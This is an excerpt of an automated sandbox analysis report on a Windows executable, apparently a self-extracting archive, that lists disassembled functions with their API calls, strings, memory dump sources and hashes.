                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 749574446-0
                                                                                                                                        • Opcode ID: 9e042c165642113cb7c2c0a6350d610ffef45d1a5caefab815bdfb9efea7c734
                                                                                                                                        • Instruction ID: 0e5ecad8bebd9f95596d94247cd4f4c2b8e2752365191664737919f88e2dab5c
                                                                                                                                        • Opcode Fuzzy Hash: 9e042c165642113cb7c2c0a6350d610ffef45d1a5caefab815bdfb9efea7c734
                                                                                                                                        • Instruction Fuzzy Hash: A8B011320E000ACA8E002B30CC08C203A20EA2230AB00C2A8A00AC80A0CB2AC002AA88
                                                                                                                                        Function 007A9023 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,007A927A,007D2120,00000000,007D3122,00000006), ref: 007A9027
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1611563598-0
                                                                                                                                        • Opcode ID: 78c6edad3f23486482ecd5128334a8cf1cd95a825ff963b57358ecfd307789a5
                                                                                                                                        • Instruction ID: ef3b12707936032dc91dd837efa66211a1569fbae5709cf9a65a8894566c7abf
                                                                                                                                        • Opcode Fuzzy Hash: 78c6edad3f23486482ecd5128334a8cf1cd95a825ff963b57358ecfd307789a5
                                                                                                                                        • Instruction Fuzzy Hash: 33A0123019410A87CA000B30CC09C19B7505760702F00C6247002C00A0CB30C810E544
                                                                                                                                        Function 007994A3 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CloseHandle.KERNELBASE(000000FF,?,?,00799473), ref: 007994BE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                        • Opcode ID: 7d394ba3df68ba8e7b7f7894787cdbf8df02fb6c705b770ecf98036c3d6bd35f
                                                                                                                                        • Instruction ID: a927e8f2405469e3c8ac4964729f4dcb21d65b8f5b4dc7b1ae4d61f8007c3976
                                                                                                                                        • Opcode Fuzzy Hash: 7d394ba3df68ba8e7b7f7894787cdbf8df02fb6c705b770ecf98036c3d6bd35f
                                                                                                                                        • Instruction Fuzzy Hash: A2F08970582B948FEF318B28E549B9377E85B11735F04871ED1FA434E0D379684A8B51

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 007AA537 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 289timewindowfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007912E7: GetDlgItem.USER32(00000000,00003021), ref: 0079132B
                                                                                                                                          • Part of subcall function 007912E7: SetWindowTextW.USER32(00000000,007C02E4), ref: 00791341
                                                                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 007AA5C8
                                                                                                                                        • EndDialog.USER32(?,00000006), ref: 007AA5DB
                                                                                                                                        • GetDlgItem.USER32(?,0000006C), ref: 007AA5F7
                                                                                                                                        • SetFocus.USER32(00000000), ref: 007AA5FE
                                                                                                                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 007AA63E
                                                                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 007AA671
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 007AA687
                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007AA6A5
                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 007AA6B5
                                                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 007AA6D2
                                                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 007AA6F0
                                                                                                                                          • Part of subcall function 0079D142: LoadStringW.USER32(?,?,00000200,?), ref: 0079D187
                                                                                                                                          • Part of subcall function 0079D142: LoadStringW.USER32(?,?,00000200,?), ref: 0079D19D
                                                                                                                                        • _swprintf.LIBCMT ref: 007AA720
                                                                                                                                          • Part of subcall function 00793F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00793F6E
                                                                                                                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 007AA733
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007AA736
                                                                                                                                        • _swprintf.LIBCMT ref: 007AA791
                                                                                                                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 007AA7A4
                                                                                                                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 007AA7BA
                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 007AA7DA
                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 007AA7EA
                                                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 007AA804
                                                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 007AA81C
                                                                                                                                        • _swprintf.LIBCMT ref: 007AA84D
                                                                                                                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 007AA860
                                                                                                                                        • _swprintf.LIBCMT ref: 007AA8B0
                                                                                                                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 007AA8C3
                                                                                                                                          • Part of subcall function 007A932F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 007A9355
                                                                                                                                          • Part of subcall function 007A932F: GetNumberFormatW.KERNEL32(00000400,00000000,?,007CA154,?,?), ref: 007A93A4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                        • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                        • API String ID: 3227067027-1840816070
                                                                                                                                        • Opcode ID: 6fbdba6d7d4a86863eb312e969cba6f109f202d097f0af523b4e4b6b19779d16
                                                                                                                                        • Instruction ID: d893927fa3917cbd1414a4ff8899cb2c9f80f050af6dde0b7c8b0a04835e5037
                                                                                                                                        • Opcode Fuzzy Hash: 6fbdba6d7d4a86863eb312e969cba6f109f202d097f0af523b4e4b6b19779d16
                                                                                                                                        • Instruction Fuzzy Hash: 8291C172548348BFD631DBA0DC49FFB77ACEB8A704F044919B645C2080E779AA05CBA7
                                                                                                                                        Function 00797070 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 299fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00797075
                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 007971D5
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007971E5
                                                                                                                                          • Part of subcall function 00797A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00797AAC
                                                                                                                                          • Part of subcall function 00797A9D: GetLastError.KERNEL32 ref: 00797AF2
                                                                                                                                          • Part of subcall function 00797A9D: CloseHandle.KERNEL32(?), ref: 00797B01
                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 007971F0
                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 007972FE
                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 0079732A
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0079733C
                                                                                                                                        • GetLastError.KERNEL32(00000015,00000000,?), ref: 0079734C
                                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00797398
                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 007973C0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                        • API String ID: 3935142422-3508440684
                                                                                                                                        • Opcode ID: 20f12470dc712f3f48128dc561bf741b1f41479193ace92bf89e4d047d637783
                                                                                                                                        • Instruction ID: d91f073f448110351a58e57a48fb671f9aa22adf70345bc4c5b4ecc138b5f098
                                                                                                                                        • Opcode Fuzzy Hash: 20f12470dc712f3f48128dc561bf741b1f41479193ace92bf89e4d047d637783
                                                                                                                                        • Instruction Fuzzy Hash: 57B1CE71914248EBDF25DF64EC49FEE77B8AF08300F148469F919E7242D738AA44CBA1
                                                                                                                                        Function 00793203 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 604COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog_memcmp
                                                                                                                                        • String ID: CMT$h%u$hc%u
                                                                                                                                        • API String ID: 3004599000-3282847064
                                                                                                                                        • Opcode ID: dd5375eafe99c73418079b3c44908bcb8c40c5883bdc9e16a1792e9c8961ed7c
                                                                                                                                        • Instruction ID: a8c141fd5f62f05ae35fb8bffac86f89e6daa09e7ef044c88276dd7511e8fcb9
                                                                                                                                        • Opcode Fuzzy Hash: dd5375eafe99c73418079b3c44908bcb8c40c5883bdc9e16a1792e9c8961ed7c
                                                                                                                                        • Instruction Fuzzy Hash: 2032C1715002849FDF15DF74D89ABEA37A5AF15304F04457DFD8ACB282DB78AA48CB60
                                                                                                                                        Function 007BA35E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __floor_pentium4
                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                                        • Opcode ID: d71b30dd8ad9cd964b3081c00f7b746ded619ac6f70ccbcb89bb52add5612a83
                                                                                                                                        • Instruction ID: 7be117bc754c474e4aa6ae8eb68afb649fe509f7a63c4b42d30721ff5240b827
                                                                                                                                        • Opcode Fuzzy Hash: d71b30dd8ad9cd964b3081c00f7b746ded619ac6f70ccbcb89bb52add5612a83
                                                                                                                                        • Instruction Fuzzy Hash: 13C26A72E086289FDB25DF28DD447EAB7B5EB84304F1541EAD84DE7240E778AE818F41
                                                                                                                                        Function 0079276C Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 793COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00792775
                                                                                                                                        • _strlen.LIBCMT ref: 00792CFF
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00792E56
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                                                                                                        • String ID: CMT
                                                                                                                                        • API String ID: 3741668355-2756464174
                                                                                                                                        • Opcode ID: 34cfe67c55567b7acde70fdd12296c65cb1e54b4e8bc62002a53782dee828231
                                                                                                                                        • Instruction ID: e865a0bb0f0ba9c5e3fbd5dccc3941410e1f47d84e5ce455b97a512889258c21
                                                                                                                                        • Opcode Fuzzy Hash: 34cfe67c55567b7acde70fdd12296c65cb1e54b4e8bc62002a53782dee828231
                                                                                                                                        • Instruction Fuzzy Hash: C662E371900688DFDF19EF74D899AEA3BE1AF54300F04457EED8A8B283D7789945CB60
                                                                                                                                        Function 007B5B53 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 007B5C4B
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 007B5C55
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 007B5C62
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                        • Opcode ID: 53f27d6d696df22ae826dc487589c6562c9b73f5851feff518ce5123a048a446
                                                                                                                                        • Instruction ID: 5d9b87cfc2911e72cedd674455e8183bc11110ace9ad3813416d2bc3007c4701
                                                                                                                                        • Opcode Fuzzy Hash: 53f27d6d696df22ae826dc487589c6562c9b73f5851feff518ce5123a048a446
                                                                                                                                        • Instruction Fuzzy Hash: 4131B47490122DABCB21DF64D989BDDBBB4AF58310F5042DAE40DA7250E7749F818F94
                                                                                                                                        Function 007B9EB0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                                                                        • Instruction ID: c2ef3c22a041ed2b16cfb3bc8c09fd11743c9714fd660f19834feea173ffcb4a
                                                                                                                                        • Opcode Fuzzy Hash: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                                                                        • Instruction Fuzzy Hash: 10021B71E002199BDF14DFA9C8807EDB7F1FF88324F25826AD915E7241E735AD418B91
                                                                                                                                        Function 007A932F Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 007A9355
                                                                                                                                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,007CA154,?,?), ref: 007A93A4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FormatInfoLocaleNumber
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2169056816-0
                                                                                                                                        • Opcode ID: 88a6f97dab185c9831d0c51daa163b5382a9b3e5302a53be822efd487dc5e3fc
                                                                                                                                        • Instruction ID: 548f10002aa4547c92e675e5e7c76eb3dbc9553e5ecab6960b489d9d6195be2a
                                                                                                                                        • Opcode Fuzzy Hash: 88a6f97dab185c9831d0c51daa163b5382a9b3e5302a53be822efd487dc5e3fc
                                                                                                                                        • Instruction Fuzzy Hash: AA018C3550134CBBDB108FA59C45FAB77BCEF09310F008526BA08D7161D378A924CBAA
                                                                                                                                        Function 007BE8D4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,007BE8CF,?,?,00000008,?,?,007BE56F,00000000), ref: 007BEB01
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                        • Opcode ID: 295e36f154dd803b8dd139774a8459c7ac6f1fc97651154fc47e28a6bc5311ad
                                                                                                                                        • Instruction ID: 6bd2f3290261772391ae2202ff70e643e2fc23263d3a6b9d501a513751a1d05d
                                                                                                                                        • Opcode Fuzzy Hash: 295e36f154dd803b8dd139774a8459c7ac6f1fc97651154fc47e28a6bc5311ad
                                                                                                                                        • Instruction Fuzzy Hash: D4B128712106089FD719CF28C48ABE57BE1FF45365F298658E89ACF3A1C739E981CB40
                                                                                                                                        Function 00793FC5 Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: gj
                                                                                                                                        • API String ID: 0-4203073231
                                                                                                                                        • Opcode ID: a0134b3f7a3ee123e2ccd6b653c182c05c62cc99ce09df7427c71f7763453235
                                                                                                                                        • Instruction ID: 49e956079d27c2d93471a87d64b8578f6d0db8bd60a5721b08c523c4ae005c61
                                                                                                                                        • Opcode Fuzzy Hash: a0134b3f7a3ee123e2ccd6b653c182c05c62cc99ce09df7427c71f7763453235
                                                                                                                                        • Instruction Fuzzy Hash: AEF1D7B1A083418FD748CF29D880A1AFBE1BFC8208F19892EF998D7711D734E9558F56
                                                                                                                                        Function 0079A8E0 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 0079A905
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Version
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1889659487-0
                                                                                                                                        • Opcode ID: 4d9484f7893c98b18c100cc74205f7ed0df5666d023da78245adcbfc6967603c
